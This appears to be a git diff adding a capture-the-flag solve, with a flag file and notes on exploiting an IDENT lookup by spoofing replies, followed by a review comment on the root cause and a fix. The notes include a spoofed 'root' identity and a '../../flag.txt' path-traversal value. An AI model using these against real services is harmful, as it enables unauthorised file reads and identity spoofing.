Diffstat (limited to 'solve')
-rw-r--r-- solve/flag 1
-rw-r--r-- solve/notes 46
2 files changed, 47 insertions, 0 deletions
diff --git a/solve/flag b/solve/flag
new file mode 100644
index 0000000..b721586
--- /dev/null
+++ b/solve/flag
@@ -0,0 +1 @@
+CSCG{wr4p_4ll_th3_th1ngs:)}
diff --git a/solve/notes b/solve/notes
new file mode 100644
index 0000000..2ec0493
--- /dev/null
+++ b/solve/notes
@@ -0,0 +1,46 @@
+Connect to the service
+
+By running `find /` we find out the flag file is in /flag.txt,
+but the correct contents are on the victim machine we can access
+via `ssh -p 2000 localhost`.
+
+Use `ssh -p 2000 localhost` to connect and get the following error:
+
+Connection to localhost (::1) 2000 port [tcp/*] succeeded!
+#########################################################################
+# #
+# Unknown User! #
+# #
+#########################################################################
+TCP Wrappers: Connection refused! Make sure that port 113 can be reached!
+User: unknown
+Client: ::1
+Hostname: localhost
+Date: Thu Mar 14 19:50:09 UTC 2024
+
+We open up port 113 using `ncat -6 -l -p 113` (ipv6 based on description hint)
+
+Next time we connect we get a single line from the victim:
+36362,2000
+
+Googling "service port 113" we find that this is the port for the IDENT
+service which when given a src,dst port pair returns the user initiating
+the connection.
+
+If we connect again and reply with `36362,2000 : USERID : UNIX : root`
+we get the following instead:
+
+cat: /tmp/users/root: No such file or directory
+
+TCP Wrappers: Hello root !
+User: root
+Client: ::1
+Hostname: localhost
+Date: Thu Mar 14 19:49:50 UTC 2024
+
+So for some reason, the user is used in a shell command to cat a file...
+
+Using path traversal we can read the flag:
+
+XXXXX,2000 : USERID : UNIX : ../../flag.txt
+
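Review bot: the line "So for some reason, the user is used in a shell command to cat a file..." near the end of solve/notes stops short of the root cause that the captured output already shows. The error `cat: /tmp/users/root: No such file or directory` means the USERID field of the ident reply is appended to /tmp/users/ and the result is read, and that reply is supplied by the connecting client, so it is untrusted input reaching a file path. Say that explicitly, and note that from /tmp/users/ the value `../../flag.txt` resolves to /flag.txt, which is the path `find /` reported at the top. The matching fix on the service side is to reject any ident user name that contains `/` or `..` before building the path. Two smaller documentation points: the last reply uses `XXXXX,2000` without saying that XXXXX stands for the port pair the service sends on that connection (`36362,2000` in the earlier capture), and the "Hello root" capture is stamped 19:49:50 while the "Unknown User!" capture that the notes present first is stamped 19:50:09, so mention that the samples were recorded out of order.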